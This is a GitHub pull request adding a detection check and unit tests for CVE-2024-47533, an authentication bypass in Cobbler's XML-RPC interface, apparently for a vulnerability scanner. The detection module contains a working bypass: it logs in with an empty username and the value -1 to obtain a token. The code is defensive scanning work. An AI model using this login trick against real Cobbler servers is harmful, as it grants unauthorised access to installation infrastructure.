Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Add Detection for CVE-2024-47533. #138

Merged
merged 9 commits into from
Nov 22, 2024
Merged
Show file tree
Hide file tree
Changes from 4 commits
Commits
File filter

Filter by extension

Filter by extension

Conversations
Failed to load comments.
Loading
Jump to
Jump to file
Failed to load files.
Loading
Diff view
Diff view
122 changes: 122 additions & 0 deletions agent/exploits/cve_2024_47533.py
Original file line number Diff line number Diff line change
@@ -0,0 +1,122 @@
"""Agent Asteroid implementation for CVE-2024-47533"""

import xmlrpc.client
import ssl
from urllib import parse as urlparse
import datetime
import re

import requests
from requests import exceptions as requests_exceptions
nmasdoufi-ol marked this conversation as resolved.
Show resolved Hide resolved
from xml.parsers import expat

from agent import definitions
from agent.asteroid_agent import logger
from agent.exploits import webexploit
from agent import exploits_registry

VULNERABILITY_TITLE = "Cobbler XMLRPC Interface Authentication Bypass"
VULNERABILITY_REFERENCE = "CVE-2024-47533"
VULNERABILITY_DESCRIPTION = """Cobbler, a widely used Linux installation server for network installation environments, contains a critical
authentication flaw in versions 3.0.0 to 3.2.2 and 3.3.6. This vulnerability is due to a defective function,
bypassing authentication checks for the Cobbler XML-RPC interface."""
RISK_RATING = "CRITICAL"
DEFAULT_TIMEOUT = datetime.timedelta(seconds=30)

JSON_INDICATORS = ['"cobbler_api"', '"mappings"', '"settings"']
XML_INDICATORS = ["<?xml", "<methodCall>", "<methodName>", "<params>"]

accept_pattern = [
re.compile("|".join(JSON_INDICATORS)),
re.compile("|".join(XML_INDICATORS)),
]


def _can_bypass_auth(target_url: str) -> bool:
"""Attempt to log in with invalid credentials to verify authentication bypass."""
try:
if target_url.startswith("https://") is True:
ssl_context = ssl.create_default_context()
ssl_context.check_hostname = False
ssl_context.verify_mode = ssl.CERT_NONE

transport = xmlrpc.client.SafeTransport(
use_datetime=True, context=ssl_context
)
conn = xmlrpc.client.ServerProxy(target_url, transport=transport)
else:
conn = xmlrpc.client.ServerProxy(target_url)

token = conn.login("", -1)
nmasdoufi-ol marked this conversation as resolved.
Show resolved Hide resolved

logger.info("Authentication bypass succeeded with token: %s", token)
nmasdoufi-ol marked this conversation as resolved.
Show resolved Hide resolved
return True

except xmlrpc.client.Fault as e:
logger.debug("Authentication attempt resulted in Fault: %s", e)
nmasdoufi-ol marked this conversation as resolved.
Show resolved Hide resolved
return False

except expat.ExpatError as e:
logger.error("XML parsing error occurred: %s", str(e))
return False

except (
xmlrpc.client.ProtocolError,
ssl.SSLError,
requests_exceptions.RequestException,
) as e:
logger.error("Connection error occurred: %s", str(e))
return False


@exploits_registry.register
class CVE202447533CobblerExploit(webexploit.WebExploit):
accept_request = definitions.Request(
method="GET",
path="/cobbler_api",
)

accept_pattern = accept_pattern
nmasdoufi-ol marked this conversation as resolved.
Show resolved Hide resolved

metadata = definitions.VulnerabilityMetadata(
title=VULNERABILITY_TITLE,
description=VULNERABILITY_DESCRIPTION,
reference=VULNERABILITY_REFERENCE,
risk_rating=RISK_RATING,
)

def check(self, target: definitions.Target) -> list[definitions.Vulnerability]:
"""Check if the target is vulnerable to the authentication bypass."""
nmasdoufi-ol marked this conversation as resolved.
Show resolved Hide resolved
vulnerabilities: list[definitions.Vulnerability] = []
target_endpoint = urlparse.urljoin(target.origin, self.accept_request.path)

if _can_bypass_auth(target_endpoint) is True:
logger.info("Authentication bypass successful.")
nmasdoufi-ol marked this conversation as resolved.
Show resolved Hide resolved
vulnerabilities.append(self._create_vulnerability(target))
else:
logger.info("Authentication bypass failed.")

return vulnerabilities

def accept(self, target: definitions.Target) -> bool:
"""Override the accept method to match JSON or XML response patterns."""
nmasdoufi-ol marked this conversation as resolved.
Show resolved Hide resolved
target_endpoint = urlparse.urljoin(target.origin, self.accept_request.path)

try:
req = requests.Request(
method=self.accept_request.method,
url=target_endpoint,
).prepare()

if self.accept_request.headers is not None:
self.accept_request.headers.update(req.headers)
req.headers = self.accept_request.headers # type: ignore
resp = self.session.send(req, timeout=DEFAULT_TIMEOUT.seconds)

except requests_exceptions.RequestException:
return False

for pattern in self.accept_pattern:
if pattern.search(resp.text) is not None:
return True
return False
200 changes: 200 additions & 0 deletions tests/exploits/cve_2024_47533_test.py
Original file line number Diff line number Diff line change
@@ -0,0 +1,200 @@
"""Unit tests for Agent Asteroid: CVE-2024-47533"""

import xmlrpc.client
from unittest import mock

import requests
import requests_mock as req_mock

from agent import definitions
from agent.exploits import cve_2024_47533


def create_mock_vulnerable_response() -> str:
"""Create a mock response that simulates a successful authentication bypass."""
return """
<?xml version='1.0'?>
<methodResponse>
<params>
<param>
<value>
<string>token123</string>
</value>
</param>
</params>
</methodResponse>
"""
nmasdoufi-ol marked this conversation as resolved.
Show resolved Hide resolved


def create_mock_secure_response() -> str:
"""Create a mock response for a safe endpoint."""
return """<?xml version='1.0'?>
<methodCall>
<methodName>login</methodName>
<params>
<param>
<value><string></string></value>
</param>
<param>
<value><int>-1</int></value>
</param>
</params>
</methodCall>"""


def testCVE202447533_whenVulnerable_reportFinding(
mocker: req_mock.mocker.Mocker, requests_mock: req_mock.mocker.Mocker
) -> None:
"""Unit test for CVE-2024-47533: case when target is vulnerable."""

mock_server_proxy = mock.MagicMock()
mock_server_proxy.login.return_value = "token123"
mocker.patch("xmlrpc.client.ServerProxy", return_value=mock_server_proxy)

requests_mock.get(
"http://localhost:80/cobbler_api",
text=create_mock_vulnerable_response(),
status_code=200,
)

exploit_instance = cve_2024_47533.CVE202447533CobblerExploit()
target = definitions.Target("http", "localhost", 80)

vulnerabilities = exploit_instance.check(target)

assert len(vulnerabilities) > 0
vulnerability = vulnerabilities[0]
assert vulnerability.entry.title == "Cobbler XMLRPC Interface Authentication Bypass"
assert vulnerability.technical_detail == (
"http://localhost:80 is vulnerable to CVE-2024-47533, Cobbler XMLRPC Interface Authentication Bypass"
)


def testCVE202447533_whenSecure_reportNothing(
requests_mock: req_mock.mocker.Mocker,
) -> None:
"""Unit test for CVE-2024-47533: case when target is secure."""

requests_mock.get(
"http://localhost:80/cobbler_api",
text=create_mock_secure_response(),
status_code=200,
)

exploit_instance = cve_2024_47533.CVE202447533CobblerExploit()
target = definitions.Target("http", "localhost", 80)

vulnerabilities = exploit_instance.check(target)

assert len(vulnerabilities) == 0


def testCVE202447533_whenConnectionError_reportNothing(
requests_mock: req_mock.mocker.Mocker,
) -> None:
"""Unit test for CVE-2024-47533: case when a connection error occurs."""
requests_mock.get(
"http://localhost:80/cobbler_api",
exc=requests.exceptions.ConnectionError,
)

exploit_instance = cve_2024_47533.CVE202447533CobblerExploit()
target = definitions.Target("http", "localhost", 80)

vulnerabilities = exploit_instance.check(target)

assert len(vulnerabilities) == 0


def testCVE202447533_when404_reportNothing(
requests_mock: req_mock.mocker.Mocker,
) -> None:
"""Unit test for CVE-2024-47533: case when the endpoint returns 404."""

requests_mock.get(
"http://localhost:80/cobbler_api",
status_code=404,
)

exploit_instance = cve_2024_47533.CVE202447533CobblerExploit()
target = definitions.Target("http", "localhost", 80)

vulnerabilities = exploit_instance.check(target)

assert len(vulnerabilities) == 0


def testCVE202447533_whenAcceptRespondsWithJsonPattern_shouldProcessNormally(
requests_mock: req_mock.mocker.Mocker,
) -> None:
"""Unit test for CVE-2024-47533: accept method matches JSON indicators."""

requests_mock.get(
"http://localhost:80/cobbler_api",
text='{"cobbler_api": "active", "settings": {}}',
status_code=200,
)

exploit_instance = cve_2024_47533.CVE202447533CobblerExploit()
target = definitions.Target("http", "localhost", 80)

result = exploit_instance.accept(target)

assert result is True


def testCVE202447533_whenAcceptRespondsWithXmlPattern_shouldProcessNormally(
requests_mock: req_mock.mocker.Mocker,
) -> None:
"""Unit test for CVE-2024-47533: accept method matches XML indicators."""

requests_mock.get(
"http://localhost:80/cobbler_api",
text=create_mock_secure_response(),
status_code=200,
)

exploit_instance = cve_2024_47533.CVE202447533CobblerExploit()
target = definitions.Target("http", "localhost", 80)

result = exploit_instance.accept(target)

assert result is True


def testCVE202447533_whenAcceptIsFalse_shouldNotProcessed(
requests_mock: req_mock.mocker.Mocker,
) -> None:
"""Unit test for CVE-2024-47533: accept method fails when no pattern matches."""

requests_mock.get(
"http://localhost:80/cobbler_api",
text="Unrelated content without JSON or XML indicators.",
status_code=200,
)

exploit_instance = cve_2024_47533.CVE202447533CobblerExploit()
target = definitions.Target("http", "localhost", 80)

result = exploit_instance.accept(target)

assert result is False


def testCVE202447533_whenFaultErrorOccurs_authBypassShouldFail(
mocker: req_mock.mocker.Mocker,
) -> None:
"""Unit test for _attempt_auth_bypass: handles xmlrpc Fault error."""

mock_server_proxy = mock.MagicMock()
mock_server_proxy.login.side_effect = xmlrpc.client.Fault(
faultCode=1, faultString="Authentication failed"
)
mocker.patch("xmlrpc.client.ServerProxy", return_value=mock_server_proxy)

exploit_instance = cve_2024_47533.CVE202447533CobblerExploit()
target = definitions.Target("http", "localhost", 80)

vulnerabilities = exploit_instance.check(target)

assert len(vulnerabilities) == 0
nmasdoufi-ol marked this conversation as resolved.
Show resolved Hide resolved
Loading